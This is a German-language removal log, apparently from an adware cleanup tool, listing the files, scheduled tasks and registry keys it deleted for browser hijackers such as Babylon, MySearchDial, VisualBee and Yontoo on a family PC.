Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\bprotector_extensions.sqlite
Datei Gelöscht : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\bprotector_prefs.js
Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\bprotector_prefs.js
Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\bprotector_prefs.js
Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\Babylon.xml
Datei Gelöscht : C:\Program Files (x86)\Mozilla Firefox\searchplugins\Babylon.xml
Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\BrowserProtect.xml
Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\delta.xml
Datei Gelöscht : C:\Users\Gast\AppData\Roaming\Mozilla\Firefox\Profiles\rqefd106.default\searchplugins\Mysearchdial.xml
Datei Gelöscht : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\searchplugins\Mysearchdial.xml
Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\Mysearchdial.xml
Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\searchplugins\Mysearchdial.xml
Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\search.xml
Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\search-here.xml
Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\smartbar.xml
Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\WebSearch.xml
Datei Gelöscht : C:\Users\Gast\AppData\Roaming\Mozilla\Firefox\Profiles\rqefd106.default\user.js
Datei Gelöscht : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\user.js
Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\user.js
Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\user.js
Datei Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\bProtector Web Data
Datei Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\bProtector Web Data
Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\bProtector Web Data
Datei Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\bprotectorpreferences
Datei Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\bprotectorpreferences
Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\bprotectorpreferences
Datei Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_eooncjejnppfjjklapaamhcdmjbilmde_0.localstorage
Datei Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_pflphaooapbgpeakohlggbpidpppgdff_0.localstorage
Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_continuetosave.info_0.localstorage-journal
Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.softonic.de_0.localstorage
Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.softonic.de_0.localstorage-journal
 
***** [ Tasks ] *****
 
Task Gelöscht : BackgroundContainer Startup Task
Task Gelöscht : BitGuard
Task Gelöscht : Express FilesUpdate
Task Gelöscht : GoforFilesUpdate
Task Gelöscht : VisualBee-enabler
Task Gelöscht : VisualBee-chromeinstaller
Task Gelöscht : VisualBee-codedownloader
Task Gelöscht : VisualBee-firefoxinstaller
Task Gelöscht : VisualBee-updater
 
***** [ Verknüpfungen ] *****
 
 
***** [ Registrierungsdatenbank ] *****
 
Schlüssel Gelöscht : HKLM\SOFTWARE\Google\Chrome\Extensions\eooncjejnppfjjklapaamhcdmjbilmde
Schlüssel Gelöscht : HKLM\SOFTWARE\Google\Chrome\Extensions\flcjcajklmlbpmgckpcmnampagbhhmcp
Schlüssel Gelöscht : HKLM\SOFTWARE\Google\Chrome\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc
Schlüssel Gelöscht : HKLM\SOFTWARE\Google\Chrome\Extensions\niapdbllcanepiiimjjndipklodoedlc
Schlüssel Gelöscht : HKLM\SOFTWARE\Google\Chrome\Extensions\nohfdhapjjlndfgjnmdlcabloeembdkj
Schlüssel Gelöscht : HKCU\Software\Google\Chrome\Extensions\pflphaooapbgpeakohlggbpidpppgdff
Schlüssel Gelöscht : HKLM\SOFTWARE\Google\Chrome\Extensions\pflphaooapbgpeakohlggbpidpppgdff
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\pflphaooapbgpeakohlggbpidpppgdff
Wert Gelöscht : HKCU\Software\Microsoft\Internet Explorer\Main [bprotector start page]
Wert Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [bProtectorDefaultScope]
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\bProtectSettings
Wert Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [BackgroundContainer]
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{C26644C4-2A12-4CA6-8F2E-0EDE6CF018F3}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\DefaultTabBHO.DLL
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\escort.DLL
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\escortApp.DLL
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\escortEng.DLL
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\escorTlbr.DLL
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\esrv.EXE
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\YontooIEClient.DLL
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\b
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\d
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\DefaultTabBHO.DefaultTabBrowser
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\DefaultTabBHO.DefaultTabBrowser.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\DefaultTabBHO.DefaultTabBrowserActiveX
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\DefaultTabBHO.DefaultTabBrowserActiveX.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\delta.deltaappCore
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\delta.deltaappCore.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\delta.deltadskBnd
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\delta.deltadskBnd.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\delta.deltaHlpr
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\delta.deltaHlpr.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\escort.escortIEPane
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\escort.escortIEPane.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\esrv.deltaESrvc
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\esrv.deltaESrvc.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\esrv.mysearchdialesrvc
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\esrv.mysearchdialesrvc.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\mysearchdial.mysearchdialappCore
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\mysearchdial.mysearchdialappCore.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\mysearchdial.mysearchdialdskBnd
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\mysearchdial.mysearchdialdskBnd.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\mysearchdial.mysearchdialHlpr
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\mysearchdial.mysearchdialHlpr.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Prod.cap
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\speedupmypc
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\YontooIEClient.Api
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\YontooIEClient.Api.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\YontooIEClient.Layers
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\YontooIEClient.Layers.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\BabMaint_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\BabMaint_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\bi_client_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\bi_client_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\GoforFiles_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\GoforFiles_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\LatestDLMgr_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\LatestDLMgr_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\Mobogenie_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\Mobogenie_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\MyBabylontb_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\MyBabylontb_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\MYSEAR~1_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\MYSEAR~1_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\MySearchDial_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\MySearchDial_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\optprostart_rasapi32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\optprostart_rasmancs
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\privitizevpn_1_rasapi32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\privitizevpn_1_rasmancs
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\UpdateTask_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\UpdateTask_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\uTorrentBar_DEAutoUpdateHelper_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\uTorrentBar_DEAutoUpdateHelper_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\YontooDesktop_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\YontooDesktop_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BonanzaDealsLive.exe
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd
Schlüssel Gelöscht : HKCU\Software\5f2d9dde235ec14
Schlüssel Gelöscht : HKLM\SOFTWARE\5f2d9dde235ec14
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_19703871
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_4e24eecb
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_703c874a
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_e14dcdfa
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_eea72b4f
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_f5d3e0aa
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CrossriderApp0033906.BHO
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CrossriderApp0033906.BHO.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CrossriderApp0033906.Sandbox
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CrossriderApp0033906.Sandbox.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Toolbar.CT2851647
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_call-of-duty-2_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_call-of-duty-2_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_grand-theft-auto-san-andreas_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_grand-theft-auto-san-andreas_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_fuer_ipadian_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_fuer_ipadian_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{09C554C3-109B-483C-A06B-F14172F1A947}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{38495740-0035-4471-851E-F5BBB86AB085}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{39CB8175-E224-4446-8746-00566302DF8D}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{72D89EBF-0C5D-4190-91FD-398E45F1D007}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{B12E99ED-69BD-437C-86BE-C862B9E5444D}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{CA5CAA63-B27C-4963-9BEC-CB16A36D56F8}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{CFDAFE39-20CE-451D-BD45-A37452F39CF0}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{058F0E48-61CA-4964-9FBA-1978A1BB060D}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{059EACC2-1ABE-49E8-928D-DC8BD355B7A9}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{0CFBE80D-5608-4309-A0F5-3B1414833432}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{10DE7085-6A1E-4D41-A7BF-9AF93E351401}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{18F33C35-8EF2-40D7-8BA4-932B0121B472}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{261DD098-8A3E-43D4-87AA-63324FA897D8}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{3004627E-F8E9-4E8B-909D-316753CBA923}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{3C471948-F874-49F5-B338-4F214A2EE0B1}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{4ED063C9-4A0B-4B44-A9DC-23AFF424A0D3}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{4FCB4630-2A1C-4AA1-B422-345E8DC8A6DE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{539F76FD-084E-4858-86D5-62F02F54AE86}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{60EACC1A-33FA-443D-9846-17B28E2C9BDB}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{7E84186E-B5DE-4226-8A66-6E49C6B511B4}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{7F6AFBF1-E065-4627-A2FD-810366367D01}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{82E1477C-B154-48D3-9891-33D83C26BCD3}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{86838207-681D-469D-9511-D0DCC6F19F9B}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{99066096-8989-4612-841F-621A01D54AD7}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{A1E28287-1A31-4B0F-8D05-AA8C465D3C5A}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{AA74D58F-ACD0-450D-A85E-6C04B171C044}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{AAA38851-3CFF-475F-B5E0-720D3645E4A5}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{C1AF5FA5-852C-4C90-812E-A7F75E011D87}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{C358B3D0-B911-41E3-A276-E7D43A6BA56D}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{D40753C7-8A59-4C1F-BE88-C300F4624D5B}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{DF7770F7-832F-4BDF-B144-100EDDD0C3AE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{E97A663B-81A6-49C5-A6D3-BCB05BA1DE26}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{FD72061E-9FDE-484D-A58A-0BAB4151CAD8}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{FE9271F2-6EFD-44B0-A826-84C829536E93}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{B92742C8-903F-6740-0B5A-F4F00ABBBCAC}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311391106}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322392206}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{0400EBCA-042C-4000-AA89-9713FBEDB671}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{06E50566-0AB7-431C-841D-62794727DAF9}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{0BD19251-4B4B-4B94-AB16-617106245BB7}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{10DE7085-6A1E-4D41-A7BF-9AF93E351401}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{1231839B-064E-4788-B865-465A1B5266FD}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{1AD27395-1659-4DFF-A319-2CFA243861A5}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{1F8EDE97-36D5-422A-B8F0-9406E2D87C60}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{26E7211D-0650-43CF-8498-4C81E83AEAAA}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{2DAC2231-CC35-482B-97C5-CED1D4185080}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{3281114F-BCAB-45E3-80D9-A6CD64D4E636}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{3F1CD84C-04A3-4EA0-9EA1-7D134FD66C82}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{3F83A9CA-B5F0-44EC-9357-35BB3E84B07F}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{44533FCB-F9FB-436A-8B6B-CF637B2D465A}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{44B29DDD-CF7A-454A-A275-A322A398D93F}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{47E520EA-CAD2-4F51-8F30-613B3A1C33EB}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{57C91446-8D81-4156-A70E-624551442DE9}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{70AFB7B2-9FB5-4A70-905B-0E9576142E1D}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{7AD65FD1-79E0-406D-B03C-DD7C14726D69}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{97DD820D-2E20-40AD-B01E-6730B2FCE630}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{9EDC0C90-2B5B-4512-953E-35767BAD5C67}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{A4DE94DB-DF03-45A3-8A5D-D1B7464B242D}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{AA0F50A8-2618-4AE4-A779-9F7378555A8F}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{B177446D-54A4-4869-BABC-8566110B4BE0}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{B2DB115C-8278-4947-9A07-57B53D1C4215}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{B97FC455-DB33-431D-84DB-6F1514110BD5}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{C67281E0-78F5-4E49-9FAE-4B1B2ADAF17B}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{D54C859C-6066-4F31-8FE0-2AAEDCAE67D7}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{D9D1DFC5-502D-43E4-B1BB-4D0B7841489A}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{E0B07188-A528-4F9E-B2F7-C7FDE8680AE4}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{E72E9312-0367-4216-BFC7-21485FA8390B}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{F05B12E1-ADE8-4485-B45B-898748B53C37}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{F6CCB6C9-127E-44AE-8552-B94356F39FFE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{FFD25630-2734-4AE9-88E6-21BF6525F3FE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355395506}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366396606}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{39CB8175-E224-4446-8746-00566302DF8D}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{4599D05A-D545-4069-BB42-5895B4EAE05B}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{D372567D-67C1-4B29-B3F0-159B52B3E967}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{F13D3582-1359-4F8F-9A48-EF3AE9F5701C}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{FBC322D5-407E-4854-8C0B-555B951FD8E3}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{FEB62B15-CC00-4736-AAEC-BA046C9DFF73}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7F6AFBF1-E065-4627-A2FD-810366367D01}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA74D58F-ACD0-450D-A85E-6C04B171C044}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C1AF5FA5-852C-4C90-812E-A7F75E011D87}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FD72061E-9FDE-484D-A58A-0BAB4151CAD8}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B92742C8-903F-6740-0B5A-F4F00ABBBCAC}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311391106}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{0CFBE80D-5608-4309-A0F5-3B1414833432}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3004627E-F8E9-4E8B-909D-316753CBA923}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{7F6AFBF1-E065-4627-A2FD-810366367D01}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{82E1477C-B154-48D3-9891-33D83C26BCD3}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{A1E28287-1A31-4B0F-8D05-AA8C465D3C5A}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{AA74D58F-ACD0-450D-A85E-6C04B171C044}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C1AF5FA5-852C-4C90-812E-A7F75E011D87}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FD72061E-9FDE-484D-A58A-0BAB4151CAD8}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FE063412-BEA4-4D76-8ED3-183BE6220D17}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B92742C8-903F-6740-0B5A-F4F00ABBBCAC}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{11111111-1111-1111-1111-110311391106}
